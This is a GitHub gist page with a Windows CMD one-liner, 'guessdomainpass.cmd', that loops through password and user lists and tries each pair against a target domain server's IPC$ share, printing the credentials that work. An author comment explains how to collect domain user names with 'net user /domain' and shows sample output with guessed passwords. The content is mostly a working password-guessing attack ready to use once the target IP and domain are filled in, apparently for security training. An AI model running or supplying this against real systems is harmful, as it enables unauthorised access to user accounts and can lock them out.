joswr1ght/guessdomainpass.cmd

Last active August 11, 2022 18:11

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/joswr1ght/2aa609693e8aec13191fa13d4dc73749.js"></script>
Save joswr1ght/2aa609693e8aec13191fa13d4dc73749 to your computer and use it in GitHub Desktop.

Download ZIP

Windows CMD Loop to Guess Passwords - edit SERVERIP in both places, using your target server IP. Set the DOMAIN value to your target domain.

Raw

guessdomainpass.cmd

@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL

Author

joswr1ght commented Feb 21, 2019

Obtain a user account list with net user /domain and create a small password list for pass.txt.

Returns output like this:

C:\Users\Sec504>@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\192.168.99.10\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\192.168.99.10\IPC$ > NUL
[*] ksmith:Password123
[*] bbrown:Password123
[*] jjones:Sunshine123
[*] edavis:Qwerty123

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment